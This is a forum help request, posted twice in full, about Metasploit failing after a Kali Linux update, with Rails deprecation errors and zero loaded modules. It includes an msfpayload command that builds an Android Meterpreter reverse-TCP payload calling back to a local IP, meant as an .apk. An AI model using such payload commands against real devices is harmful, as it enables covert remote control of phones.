Hello everyone!
As the title mentions i am having issues with a Rails error, when i do the following:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.32 LPORT= 443
I get this:
You did not specify how you would like Rails to report deprecation notices for your production environment, please set config.active_support.deprecation to :notify at config/environments/production.rb
Invalid payload: android/meterpreter/reverse_tcp
I am trying to make a .apk file to use on my android smartphone.
Everything worked untill i got a kali linux software update which updated metasploit.
I tried what the error says
(rails set config.active_support.deprecation :notify config/environments/production.rb)
It creates all the files but it just keeps giving the error.
When i startup metasploit it says:
/usr/share/metasploit-framework/config/boot.rb:4: warning: already initialized constant GEMFILE_EXTENSIONS
[-] WARNING! The following modules could not be loaded!
[-] /opt/metasploit/apps/pro/metamodules/firewall_egress/modules/auxiliary/metamodule/firewall_egress.rb: LoadError cannot load such file -- firewall_egress/result_range
And this too
=[ metasploit v4.10.0-2014081301 [core:4.10.0.pre.2014081301 api:1.0.0]]
+ -- --=[ 0 exploits - 0 auxiliary - 0 post ]
+ -- --=[ 0 payloads - 0 encoders - 0 nops ]
This is wierd because earlier today (rbefore the update) i had alot of exploits etc.
Does this has to do anything with the Rails error?
Can you try to explain what you would do because i never used Rails before...
I do am comfortable with Unix' command shell etc.
My guess is that the metasploit update broke somethings.
Is there a way to roll it back?
Thanks in advance
Yordi
As the title mentions i am having issues with a Rails error, when i do the following:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.32 LPORT= 443
I get this:
You did not specify how you would like Rails to report deprecation notices for your production environment, please set config.active_support.deprecation to :notify at config/environments/production.rb
Invalid payload: android/meterpreter/reverse_tcp
I am trying to make a .apk file to use on my android smartphone.
Everything worked untill i got a kali linux software update which updated metasploit.
I tried what the error says
(rails set config.active_support.deprecation :notify config/environments/production.rb)
It creates all the files but it just keeps giving the error.
When i startup metasploit it says:
/usr/share/metasploit-framework/config/boot.rb:4: warning: already initialized constant GEMFILE_EXTENSIONS
[-] WARNING! The following modules could not be loaded!
[-] /opt/metasploit/apps/pro/metamodules/firewall_egress/modules/auxiliary/metamodule/firewall_egress.rb: LoadError cannot load such file -- firewall_egress/result_range
And this too
=[ metasploit v4.10.0-2014081301 [core:4.10.0.pre.2014081301 api:1.0.0]]
+ -- --=[ 0 exploits - 0 auxiliary - 0 post ]
+ -- --=[ 0 payloads - 0 encoders - 0 nops ]
This is wierd because earlier today (rbefore the update) i had alot of exploits etc.
Does this has to do anything with the Rails error?
Can you try to explain what you would do because i never used Rails before...
I do am comfortable with Unix' command shell etc.
My guess is that the metasploit update broke somethings.
Is there a way to roll it back?
Thanks in advance
Yordi